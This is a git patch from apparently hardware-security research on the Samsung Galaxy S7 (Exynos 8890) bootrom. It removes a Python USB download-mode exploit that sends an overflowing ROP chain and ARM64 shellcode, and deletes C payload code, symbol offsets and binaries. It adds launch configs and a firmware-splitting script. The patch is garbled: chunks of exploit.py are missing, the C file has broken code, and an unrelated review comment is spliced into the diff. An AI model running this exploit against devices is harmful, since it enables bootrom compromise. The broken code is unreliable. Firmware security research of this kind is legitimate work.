From ceba89556672954b596f44746749210034533608 Mon Sep 17 00:00:00 2001
From: Eljakim Herrewijnen
Date: Fri, 2 Aug 2024 21:19:14 +0200
Subject: [PATCH] update
---
source/Makefile | 17 --
source/S7/.vscode/launch.json | 16 ++
source/S7/split-sboot-8890.sh | 5 +
source/dump_bootrom.elf | Bin 896 -> 0 bytes
source/dwc3.elf | Bin 7584 -> 0 bytes
source/dwc3.o | Bin 1584 -> 0 bytes
source/entry.S | 2 -
source/entry.o | Bin 640 -> 0 bytes
source/exploit.py | 288 -----------------------------
source/exploit/.vscode/launch.json | 16 ++
source/ghidra.py | 9 -
source/symbols.txt | 5 -
source/test_dwc3.c | 100 ----------
source/test_dwc3.ld | 14 --
14 files changed, 37 insertions(+), 435 deletions(-)
delete mode 100644 source/Makefile
create mode 100644 source/S7/.vscode/launch.json
create mode 100755 source/S7/split-sboot-8890.sh
delete mode 100644 source/dump_bootrom.elf
delete mode 100755 source/dwc3.elf
delete mode 100644 source/dwc3.o
delete mode 100644 source/entry.S
delete mode 100644 source/entry.o
delete mode 100644 source/exploit.py
create mode 100644 source/exploit/.vscode/launch.json
delete mode 100644 source/ghidra.py
delete mode 100644 source/symbols.txt
delete mode 100644 source/test_dwc3.c
delete mode 100644 source/test_dwc3.ld
diff --git a/source/Makefile b/source/Makefile
deleted file mode 100644
index 28d2fe1..0000000
--- a/source/Makefile
+++ /dev/null
@@ -1,17 +0,0 @@
-ifeq ($(ANDROID_NDK_ROOT),)
-$(error Error : Set the env variable 'ANDROID_NDK_ROOT' with the path of the Android NDK (version 20))
-endif
-
-CC := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android27-clang
-AR := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ar
-OBJCOPY := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy
-LD := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ld.bfd
-
-#==================Target Samsung S7 (8890)==================
-CFLAGS_SAMSUNGS7 = -Os
-
-dwc3:
- $(CC) entry.S -c -o entry.o $(CFLAGS_SAMSUNGS7)
- $(CC) $(CFLAGS_SAMSUNGS7) -c test_dwc3.c -o dwc3.o
- $(LD) -T test_dwc3.ld entry.o dwc3.o -o dwc3.elf --just-symbols=symbols.txt
- $(OBJCOPY) -O binary dwc3.elf dwc3.bin
diff --git a/source/S7/.vscode/launch.json b/source/S7/.vscode/launch.json
new file mode 100644
index 0000000..72536f9
--- /dev/null
+++ b/source/S7/.vscode/launch.json
@@ -0,0 +1,16 @@
+{
+ // Use IntelliSense to learn about possible attributes.
+ // Hover to view descriptions of existing attributes.
+ // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
+ "version": "0.2.0",
+ "configurations": [
+ {
+ "name": "Run exploit",
+ "type": "python",
+ "request": "launch",
+ "program": "exploit.py",
+ "console": "integratedTerminal",
+ "justMyCode": false
+ }
+ ]
+}
\ No newline at end of file
diff --git a/source/S7/split-sboot-8890.sh b/source/S7/split-sboot-8890.sh
new file mode 100755
index 0000000..03b4930
--- /dev/null
+++ b/source/S7/split-sboot-8890.sh
@@ -0,0 +1,5 @@
+# input file argument : sboot.bin - G930W8VLS6CSH1 - sha1sum: 9322ccb4e9b382b8cc67ff9ef989c459a763621f
+dd if=$1 of=$1.1.bin skip=0 bs=512 count=16 # 0x2000 @ 0x0
+dd if=$1 of=$1.2.bin skip=16 bs=512 count=288 # 0x24000 @ 0x2000
+dd if=$1 of=$1.3.bin skip=155648 bs=1 count=158992 # 0x26d10 @ 0x26000
+dd if=$1 of=$1.4.bin skip=776 bs=512 count=1672 # 0xD1000 @ 0x61000
diff --git a/source/dump_bootrom.elf b/source/dump_bootrom.elf
deleted file mode 100644
index 570320d35fcafe2a3178b4fe6cf6799d645e7e78..0000000000000000000000000000000000000000
GIT binary patch literal 0 HcmV?d00001 literal 896 zcmb<-^>JfjWMqH=MuzPS2p&w7f#Cp>paWRgfq|WYjlq#&K@bB&Ll83q!xSKWiGe}> z+TZHEE17{}$}tSaj!lh0f0-F3ehy|_*~&Kak_k|pb;Y7ji^Ls%varv*q{bkk#RB9{ z2C{{Lv@;8%=HZ5hAcqz5T#3UeHQUswhV62kViV_CBl*E!m z2EC->Vl-Pw=Sl;$fPBG*rquz;2SzFifcOs~qzGh!^rMH+6@(HL7J7)O17$fV&<`>X zTdduH+PVTtvjS<5A3=73fCPkM-~`g>ZU;#wZi>OuJimhYCVc;zeRS zNC<(W-h_BCkwi~wj4}KH#=D6oUJ(vlnmV&P!$$=!UT2ftH}iYH_j}u4XHTzkefWkH z3IV?)cnAKjLy{<#W(m2IEqp8q63H|{*ylFxrpPL&<8i$sNb(4QI^6k%t)_i-M{in> zPK&H?KsX>A5Do|jgag6>;ec>JI3OGl4hRQ?1Hu8}fN(%KARG`52nU1%dmK;z+P6kN zthB?E(du+)rFsqKH^ZUmSo(##yj)q@1nB!6J{4`5NiRfCr<2W%u<=xa)XQ3JECREm zb8V2SP7keYjeLIfDXe|pJaKM&foPE#!t=XCqpMY(PZOS$p54)}koqr+l_iQ-NRJ<3 zSmm4xWdD`iIVqhw-v|$AAF983?CLhvr?(99x9arAm1-E~f7WVCbU$QUu9LUqNPkLI z)&7)h=pM3U$Clm1K>t9Z*X)taf^KK!GIG526e;i)#JL6NuW&9>Px7-gNXraKp#Yg z8ISkr@s!#lM|NIiczFC)(AO*5J$wFzgO~nvh0S61GQwo~Qh(8zO#^Jy>hTsIAlW*d znwhv>*YUxK%O+%O=o+Z`vZ0^kZn4iGsf_3WLe-3xCdX)n#@_FJ~ z9Zq}Ei^r2>9rls^k3aOq$Q2F3&Xd=1fbReO+5l$H1dMf7Kxd%zTWAho{_}k7p#C>m L|5e84p}zlLF1r61
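Review bot: split-sboot-8890.sh is committed executable (new file mode 100755) but its first line is a comment rather than a shebang, and `$1` is used unquoted and never validated, so running it with no argument or with a path containing spaces yields four `dd` failures or partially written `*.bin` files instead of one clear usage error. The four byte offsets are specific to the single build named in the header comment, whose sha1 is already written there, yet nothing enforces it, so a different sboot image would be silently cut at the wrong boundaries. I would open with `#!/bin/sh` and `set -eu`, check the argument count and readability, verify the digest with `sha1sum -c` before the first `dd`, and quote `"$1"` in every `if=`/`of=`. The rewritten prologue is below; the three remaining `dd` lines change only by the same quoting.
```shell
#!/bin/sh
# input file argument : sboot.bin - G930W8VLS6CSH1 - sha1sum: 9322ccb4e9b382b8cc67ff9ef989c459a763621f
set -eu
if [ $# -ne 1 ] || [ ! -r "$1" ]; then
    echo "usage: $0 sboot.bin" >&2
    exit 1
fi
# The offsets below only hold for the build named above; refuse any other image.
printf '%s  %s\n' 9322ccb4e9b382b8cc67ff9ef989c459a763621f "$1" | sha1sum -c - >/dev/null
dd if="$1" of="$1.1.bin" skip=0 bs=512 count=16 # 0x2000 @ 0x0
# … unchanged: the three remaining dd lines, with "$1" quoted the same way …
```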
diff --git a/source/dwc3.o b/source/dwc3.o deleted file mode 100644 index d4c13dcab341d808712b10d739cb29e7a2eeabd6..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1584 zcmbu8O=uHQ5XUD;Yg-hQ)`B4D3O%HSZZ=7q5Am>7)JwEdTTjBe*?sxYWH;`<#+DXZ z@SuobO9d|;DtKtbg9ktGqDA!LS-cA#yq5ORONcY++jNbs7Y8;o^PB(7doTNT;e6&o zFc1LG0`LxYGmipPI(B2V8LH5Q%B}GawWDxvqCOX>)z885W+*T;sjfOGdAtcQ@+;Ig z)HAQH4E3w2?oQZv5QOxzMq@Gzixc;IAzhyvt8I;cT3Zik-!~7R*j~X|xc<^roN)?Z zSw&q?U2M%?z64vso7SQEn_XwOX+Av?NZ;ynA8YjxEdOjY zo=^^Bmg(3$UdLzZCk6(BBaLk>DZ)ul`nW>Lc?`GK8_W zRDaYx%JfjWMqH=MuzPS2p&unNFxb4fQ20x*dT%;NUAWH=3o&f3~?SD;zB@i0Swg$ z0V$w6m=RnC2EC%xoJ75n)QS>@;*!Lo5{BHw%sd9Yy!?_>J$JuQU7%ocHiKSqNl{5+ z5|FOU1<@)MdIrd*kj+*H>O^r5)T9GY+6GF)D5PKn3$X!7kQj(Y1`bdT3$h@Pjm`(@ zMHd5USpgz|KmtNBumWjNEO0>iFmZ7pAKgtLB`#2P=oGqIeV_u&*kxewfND&D(ja}H Ia6-2q0KIw|MgRZ+ diff --git a/source/exploit.py b/source/exploit.py deleted file mode 100644 index addd672..0000000 --- a/source/exploit.py +++ /dev/null 
@@ -1,288 +0,0 @@ -import usb.core -import usb.util -import struct, sys, usb1, libusb1, ctypes, usb -from keystone import * -from capstone import * -# from ghidra_assistant.utils.utils import * - -def p32(x): - return struct.pack("= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]: - break - self.send_empty_transfer() - current_offset += CHUNK_SIZE - cnt += 1 - if current_offset > 0x100000000: - current_offset = current_offset - 0x100000000 #reset 32 byte integer - print(f"{cnt} {hex(current_offset)}") - - remaining = (TARGET_OFFSETS[self.target][1] - current_offset) - assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet" - if remaining > BLOCK_SIZE: - self.send_empty_transfer() - # Send last transfer, TODO who aligns this ROM?? - current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE) - cnt += 1 - print(f"{cnt} {hex(current_offset)}") - - # Build ROP chain. - rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2) - transferred = ctypes.c_int(0) - res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0) - assert res == 0, "Error sending ROP chain" - - # Send some data - p = b"\xaa" * 0x200 - transferred.value = 0 - res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100) - assert res == 0, "Error sending data" - - buf = ctypes.c_buffer(b"", 0x20000) - res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100) - - # Should have received some bytes - pass - -ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN) -def usb_debug(): - shellcode = f""" - start: - adr x0, test_fun - ldr x0, [x0] - blr x0 - - mov w1, #0x20000 // size - mov w0, #0x0 // address - bl usb_send - mov x0, #0 - br x0 //reset - - #Setup read usb - mov 
w0, #0x2 - adr x1, shellcode_base - ldr x1, [x1] - mov w2, #0x02020000 - add w2, w2, #0x2000 - # endpoint, cb, buffer - adr x5, maybe_usb_setup_read - ldr x5, [x5] - blr x5 - - - # Get something?? arg0 is endpoint - mov w0, #0x2 - adr x1, maybe_read_size_endpoint - ldr x1, [x1] - blr x1 - - - # # Send some data from ROM - # mov w1, #0x200 // size - # mov w0, #0x0 // address - # bl usb_send - # mov x0, #0 - # br x0 //reset - - - # # dwc3_ep0_start_trans - # mov w1, w0 - # mov w0, #0x2 - # mov w2, #0x200 - # adr x5, dwc3_ep0_start_trans - # ldr x5, [x5] - # blr x5 - - # # Send some data from ROM - # mov w1, #0x200 // size - # mov w0, #0x0 // address - # bl usb_send - # mov x0, #0 - # br x0 //reset - - usb_send: - stp x29, x30, [sp,#-48]! - mov w3, #0x0 - bfxil w3, w1, #0, #24 - mov w1, #0xc12 - mov x29, sp - stp x19, x20, [sp,#16] - mov x5, #0xc834 - mov w20, #0x1 - movk x5, #0x1540, lsl #16 - ldr x2, [x29,#40] - mov x4, #0xc838 - orr w6, w1, w20 - movk x4, #0x1540, lsl #16 - mov x19, #0xc83c - movk x19, #0x1540, lsl #16 - stp w3, w1, [x2,#8] - mov w3, #0x406 - stp w0, wzr, [x2] - mov w0, w20 - ldr x1, [x29,#40] - strb w6, [x2,#12] - mov x2, #0x27c8 - str w1, [x5] - mov w1, #0x1388 - str wzr, [x4] - str w3, [x19] - blr x2 - mov w0, w20 - ldr w1, [x19] - ldp x19, x20, [sp,#16] - ldp x29, x30, [sp],#48 - ret - - usb_read_endpoint: .quad 0x00006654 - maybe_usb_setup_read: .quad 0x00006f88 - shellcode_base: .quad 0x02021800 - maybe_read_size_endpoint: .quad 0x00007a7c - dwc3_ep0_start_trans: .quad 0x0000791c - test_fun: .quad 0x000064e0 -""" - shellcode = ks.asm(shellcode, as_bytes=True)[0] - - shellcode = open("dwc3.bin", "rb").read() - - exynos = ExynosDevice() - exynos.exploit(shellcode) - -if __name__ == "__main__": - usb_debug() - sys.exit(0) - # wait_for_device() - exynos = ExynosDevice() - exynos.test_bug_2() - sys.exit(0) - path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin" - # path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin" - 
exynos.exploit(open(path, "rb").read())
- pass
diff --git a/source/exploit/.vscode/launch.json b/source/exploit/.vscode/launch.json
new file mode 100644
index 0000000..ed07101
--- /dev/null
+++ b/source/exploit/.vscode/launch.json
@@ -0,0 +1,16 @@
+{
+ // Use IntelliSense to learn about possible attributes.
+ // Hover to view descriptions of existing attributes.
+ // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
+ "version": "0.2.0",
+ "configurations": [
+ {
+ "name": "Debug exploit",
+ "type": "debugpy",
+ "request": "launch",
+ "program": "exploit.py",
+ "console": "integratedTerminal",
+ "args": ["--debug"]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/source/ghidra.py b/source/ghidra.py
deleted file mode 100644
index 18dfd85..0000000
--- a/source/ghidra.py
+++ /dev/null
@@ -1,9 +0,0 @@
-from ghidra_assistant.ghidra_assistant import GhidraAssistant
-
-if __name__ == "__main__":
- rom = open("S7/rom.bin", 'rb').read()
-
- ga = GhidraAssistant()
- ga.ghidra.add_memory(rom, 0x0, True, "ROM")
-
- pass
\ No newline at end of file
diff --git a/source/symbols.txt b/source/symbols.txt
deleted file mode 100644
index ce55876..0000000
--- a/source/symbols.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-maybe_usb_setup_read = 0x00006f88;
-dwc3_ep0_start_trans = 0x0000791c;
-usb_event_handler = 0x00007bac;
-get_endpoint_buffer = 0x00007a7c;
-sleep = 0x000027c8;
\ No newline at end of file
diff --git a/source/test_dwc3.c b/source/test_dwc3.c
deleted file mode 100644
index f746b7a..0000000
--- a/source/test_dwc3.c
+++ /dev/null
@@ -1,100 +0,0 @@
-#include
-
-// Create external function at 0x00006f88
-extern void maybe_usb_setup_read(char endpoint,void *fun,uint32_t target_buffer);
-extern void dwc3_ep0_start_trans(char endpoint,uint32_t target_buf, uint32_t len);
-extern int usb_event_handler(void);
-extern void * get_endpoint_buffer(char endpoint);
-extern void sleep(int endpoint,uint32_t timeout);
-
-#define recv_buffer 0x02021800 + 0x2000
-#define data_received 0x02021800 + 0x2004
-
-void recv_data_cb(uint32_t endpoint, uint32_t len){
- void *rbuf;
- void *dest_buf = (void *)recv_buffer;
- volatile void *dref = (void *)data_received;
-
- rbuf = get_endpoint_buffer(endpoint);
- for(int i= 0; i < len; i++){
- *(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
- }
- *(uint8_t *)dref = 1; // Mark as ready
-}
-
-void recv_data(){
- // Set data_received to 0
- // uint32_t *r = (uint32_t *) data_received;
- // r = 0;
- volatile void *dref = (void *)data_received;
- *(uint8_t *)dref = 0;
-
- maybe_usb_setup_read(2, recv_data_cb, 0x200);
- void *rbuf = get_endpoint_buffer(2);
- dwc3_ep0_start_trans(2, (uint32_t)rbuf, 0x200);
- while(1){
- usb_event_handler();
- if(*(uint8_t *)dref == 1){
- break;
- }
- }
-}
-
-void send_data(void *address, uint32_t size){
- maybe_usb_setup_read(0x81, NULL, 0x200);
- void *rbuf = get_endpoint_buffer(1);
- for(int i= 0; i < size; i++){
- *(char *)(void *)((int)rbuf + i) = *(char *)(void *)((int)address + i);
- }
- dwc
-
-}
-
-void send_data(uint32_t *address, uint32_t size)
-{
- // asm("stp x29, x30, [sp,#-48]!");;
- // asm("mov w3, #0x0");
- // asm("bfxil w3, w1, #0, #24");
- // asm("mov w1, #0xc12");
- // asm("mov x29, sp");
- // asm("stp x19, x20, [sp,#16]");
- // asm("mov x5, #0xc834");
- // asm("mov w20, #0x1");
- // asm("movk x5, #0x1540, lsl #16");
- // asm("ldr x2, [x29,#40]");
- // asm("mov x4, #0xc838");
- // asm("orr w6, w1, w20");
- // asm("movk x4, #0x1540, lsl #16");
- // asm("mov x19, #0xc83c");
- // asm("movk x19, #0x1540, lsl #16");
- // asm("stp w3, w1, [x2,#8]");
- // asm("mov w3, #0x406");
- // asm("stp w0, wzr, [x2]");
- // asm("mov w0, w20");
- // asm("ldr x1, [x29,#40]");
- // asm("strb w6, [x2,#12]");
- // asm("mov x2, #0x27c8");
- // asm("str w1, [x5]");
- // asm("mov w1, #0x1388");
- // asm("str wzr, [x4]");
- // asm("str w3, [x19]");
- // asm("blr x2");
- // asm("mov w0, w20");
- // asm("ldr w1, [x19]");
- // asm("ldp x19, x20, [sp,#16]");
- // asm("ldp x29, x30, [sp],#48");
- // asm("ret");
-}
-
-int main() {
- while(1){
- recv_data();
- }
-
-
-
- // recv_data();
- // sleep(1, 5000);
- asm("mov x0, #0x0");
- asm("br x0");
-}
diff --git a/source/test_dwc3.ld b/source/test_dwc3.ld
deleted file mode 100644
index d2991ee..0000000
--- a/source/test_dwc3.ld
+++ /dev/null
@@ -1,14 +0,0 @@
-MEMORY {
- ROM (rwx): ORIGIN = 0x02021800, LENGTH = 0x1000
-}
-
-SECTIONS
-{
- . = 0x02021800;
- .text . : {
- *(.text*)
- *(.data*)
- *(.rodata*)
- } >ROM
-
-}
\ No newline at end of file